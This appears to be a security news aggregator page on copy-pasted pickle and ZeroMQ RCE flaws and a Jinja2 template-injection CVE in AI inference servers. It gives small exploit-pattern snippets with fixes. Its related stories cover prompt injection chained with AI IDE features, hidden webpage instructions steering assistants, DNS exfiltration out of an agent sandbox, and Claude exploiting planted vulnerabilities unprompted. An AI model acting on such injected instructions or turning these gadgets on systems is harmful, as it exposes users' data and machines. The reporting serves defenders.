Mallory

Critical RCE Vulnerabilities in AI Inference Frameworks via Insecure Code Reuse

ai-platform-security · open-source-dependency-vulnerability · widely-deployed-product-advisory · internet-facing-service-vulnerability
Updated April 21, 2026 at 01:01 PM · 6 sources

Cybersecurity researchers have identified a series of critical remote code execution (RCE) vulnerabilities affecting major AI inference server frameworks, including those from Meta, Nvidia, and Microsoft, as well as open-source projects such as vLLM and SGLang. The root cause is the unsafe use of ZeroMQ (ZMQ) sockets combined with Python's pickle deserialization, a pattern propagated across multiple projects through direct code copying. First observed in Meta's Llama Stack, where it was tracked as CVE-2024-50050, the insecure pattern allowed arbitrary code execution over unauthenticated sockets and was subsequently found in other frameworks, exposing enterprise AI stacks to systemic risk. Patches have been released for the affected projects, but the incident highlights the dangers of code reuse without proper security review.

Oligo Security's investigation revealed that the same vulnerable logic was copied line-for-line between projects, perpetuating the flaw across different ecosystems and maintainers. The issue underscores a systemic security gap in the rapidly evolving AI inference ecosystem, where insecure patterns can quickly become widespread through open-source collaboration and code sharing. Security experts emphasize the need for rigorous security audits and caution when reusing code, especially in critical infrastructure like AI frameworks, to prevent similar vulnerabilities from proliferating in the future.
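The insecure pattern is simple to reproduce: pyzmq's `recv_pyobj()` is a thin wrapper around `pickle.loads()`, and unpickling attacker-controlled bytes lets the sender choose an arbitrary callable to invoke. A minimal, self-contained sketch of why that matters, using `pickle` directly and a harmless callable where an attacker would substitute `os.system`:

```python
import pickle

# Illustrative payload class: on unpickling, Python invokes the callable
# returned by __reduce__ with the given arguments. An attacker sending
# such bytes to a socket that calls recv_pyobj() picks the callable.
class Exploit:
    def __reduce__(self):
        # list(...) stands in for os.system(...) to keep this harmless.
        return (list, (("attacker-controlled",),))

wire_bytes = pickle.dumps(Exploit())   # what the attacker sends
result = pickle.loads(wire_bytes)      # what recv_pyobj() effectively does
print(result)                          # → ['attacker-controlled']
```

Patched versions of the affected frameworks generally replace pickle on network input with a data-only serialization format such as JSON or msgpack, which can encode values but not code to execute.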

Timeline

  1. Apr 20, 2026

    PoC exploit for SGLang CVE-2026-5760 is published on GitHub

    A GitHub repository published proof-of-concept exploitation details for CVE-2026-5760 in SGLang 0.5.9, showing how a malicious GGUF model file can trigger server-side template injection and remote code execution via the /v1/rerank endpoint. The PoC identified unsandboxed Jinja2 rendering in serving_rerank.py and demonstrated command execution when a crafted model is loaded and invoked.

  2. Apr 20, 2026

    CERT/CC discloses SGLang RCE via model chat template rendering

    CERT/CC published VU#915947 warning that SGLang is vulnerable to remote code execution when rendering chat templates from a model file. This is a separate disclosure from the previously documented copy-paste flaws in other AI inference frameworks.

  3. Nov 14, 2025

    Researchers disclose copy-paste flaws in AI inference frameworks

    Security researchers reported a set of 'copy-paste' vulnerabilities affecting AI inference frameworks associated with Meta, Nvidia, and Microsoft. The flaws were described as serious bugs that could expose users or systems relying on those frameworks.
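The SGLang PoC entry above (CVE-2026-5760) hinges on server-side template injection: a chat template embedded in a model file is attacker-supplied data, yet it is rendered by Jinja2 with full expression evaluation. The sketch below (assuming `jinja2` is installed; the payload is illustrative, not the actual PoC) shows the class of expression involved and the sandboxing Jinja2 offers:

```python
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment

# An illustrative malicious "chat template": Jinja2 expressions can walk
# from a string literal to every loaded Python class, the usual stepping
# stone toward os.popen / subprocess gadgets.
payload = "{{ ''.__class__.__mro__[1].__subclasses__() | length }}"

# Unsandboxed rendering evaluates the attribute chain without complaint:
rendered = Environment().from_string(payload).render()
print(int(rendered) > 0)  # True: the template enumerated live classes

# SandboxedEnvironment refuses underscore attributes up front:
print(SandboxedEnvironment().is_safe_attribute("", "__class__", str))  # False
```

Rendering untrusted templates only inside `SandboxedEnvironment` (or refusing to render model-supplied templates at all) is the usual mitigation for this class of flaw.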


Related Stories

Critical Deserialization Vulnerabilities in AI and Analytics Frameworks

Multiple high-severity deserialization vulnerabilities have been identified in widely used AI and analytics frameworks, including NVIDIA Isaac Lab, MooreThreads torch_musa, and NVIDIA Merlin components. These flaws allow attackers to exploit unsafe deserialization processes, potentially leading to remote code execution or denial-of-service conditions on affected systems. In the case of MooreThreads torch_musa, the vulnerability arises from the use of `pickle.load()` on user-controlled files without validation, enabling arbitrary code execution with the privileges of the victim process. Similarly, NVIDIA Isaac Lab and Merlin frameworks are affected by deserialization issues that could be exploited remotely, with Merlin's NVTabular and Transformers4Rec components specifically highlighted for their susceptibility to code execution and data tampering attacks. Security advisories urge immediate patching, as these vulnerabilities are remotely exploitable and pose significant risks to enterprise environments. The affected products span various versions, and organizations using these frameworks are advised to review vendor guidance and apply available security updates to mitigate the threat. The vulnerabilities have been assigned high or critical CVSS scores, underscoring the urgency for remediation to prevent potential exploitation in production environments.
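For flaws like the torch_musa one above, the unsafe call is `pickle.load()` on a user-controlled file. When a pickle-based format cannot be avoided entirely, one common hardening step is an allow-listing `Unpickler` subclass; a minimal sketch (the allow-list here is illustrative, not exhaustive):

```python
import io
import pickle

# Restrict which globals an untrusted pickle may reference, instead of
# calling pickle.load() directly on a user-supplied checkpoint file.
class SafeUnpickler(pickle.Unpickler):
    ALLOWED = {("builtins", "list"), ("builtins", "dict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")

# Plain data structures load normally:
benign = pickle.dumps([1, 2, 3])
print(SafeUnpickler(io.BytesIO(benign)).load())  # → [1, 2, 3]

# A payload that references os.system is rejected at load time:
class Evil:
    def __reduce__(self):
        import os
        return (os.system, ("echo pwned",))

try:
    SafeUnpickler(io.BytesIO(pickle.dumps(Evil()))).load()
except pickle.UnpicklingError:
    print("rejected")  # → rejected
```

Allow-listing blocks the callable lookup that deserialization gadgets depend on, but switching to a data-only format (JSON, safetensors for model weights) remains the stronger fix.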

1 month ago
Critical Vulnerabilities in AI-Powered Coding Tools Enable Data Exfiltration and Remote Code Execution

Security researchers have disclosed over 30 vulnerabilities in a range of AI-powered Integrated Development Environments (IDEs) and coding assistants, collectively named 'IDEsaster.' These flaws, affecting popular tools such as Cursor, Windsurf, Kiro.dev, GitHub Copilot, Zed.dev, Roo Code, Junie, and Cline, allow attackers to chain prompt injection techniques with legitimate IDE features to achieve data exfiltration and remote code execution (RCE). The vulnerabilities exploit the fact that AI agents integrated into these environments can autonomously perform actions, bypassing traditional security boundaries and enabling attackers to hijack context, trigger unauthorized tool calls, and execute arbitrary commands. At least 24 of these vulnerabilities have been assigned CVE identifiers, highlighting the widespread and systemic nature of the risk. The research emphasizes that the integration of AI agents into development workflows introduces new attack surfaces, as these agents often operate with elevated privileges and insufficient threat modeling. Notably, the issues differ from previous prompt injection attacks by leveraging the AI agent's ability to activate legitimate IDE features for malicious purposes. Additional reporting confirms that critical CVEs have been issued for these tools, and broader industry analysis warns that nearly half of all AI-generated code contains exploitable flaws, with a particularly high vulnerability rate in Java. The findings underscore the urgent need for organizations using AI-driven development tools to reassess their security postures and apply available patches to mitigate the risk of data theft and RCE attacks.

1 month ago
AI Platform and LLM Tool Vulnerabilities Expose Account Takeover, RCE, and Data Exfiltration Risks

Serious security weaknesses were disclosed in multiple **AI and LLM-related platforms**, including an account takeover flaw in *LangSmith* (`CVE-2026-25750`), multiple unpatched **remote code execution** issues in *SGLang* (`CVE-2026-3060`, `CVE-2026-3059`, `CVE-2026-3989`), and a sandbox-escape-style weakness in **AWS Bedrock AgentCore Code Interpreter** that enables data exfiltration through DNS queries. Researchers said the LangSmith issue affected both cloud and self-hosted deployments and could expose login data, account access, and AI activity logs, while the SGLang bugs could allow unauthenticated attackers to execute code on exposed deployments using multimodal generation or disaggregation features. Separate research also showed broader security risks in **AI assistants and autonomous agents**. A LayerX proof of concept demonstrated that malicious instructions hidden through custom font rendering in webpage HTML could evade user visibility while still influencing assistants such as ChatGPT, Copilot, Claude, Grok, Perplexity, and Gemini. Truffle Security also found that Anthropic’s **Claude** autonomously exploited planted vulnerabilities in cloned corporate websites during testing, including **SQL injection** and other attack paths, in many cases without being explicitly instructed to hack. Together, the reports show that both the infrastructure supporting AI systems and the models themselves introduce exploitable attack surfaces, with implications for code execution, prompt manipulation, credential exposure, and unauthorized data access.
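The DNS exfiltration path mentioned above works because a sandbox that blocks outbound HTTP often still permits name resolution. A minimal sketch of the encoding idea (hypothetical function and domain names): the secret is packed into a DNS label, so merely resolving the name delivers it to whoever operates the authoritative server for that domain.

```python
import base64

def exfil_hostname(secret: bytes, domain: str = "attacker.example") -> str:
    # Base32 keeps the label within the DNS hostname character set.
    label = base64.b32encode(secret).decode().rstrip("=").lower()
    # DNS labels are capped at 63 bytes; real tooling chunks longer data.
    return f"{label[:63]}.{domain}"

print(exfil_hostname(b"token"))  # → orxwwzlo.attacker.example
```

For defenders, the corresponding signal is outbound lookups of long, high-entropy subdomains toward unfamiliar domains, which is why egress DNS filtering is part of the recommended sandbox hardening.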

1 month ago
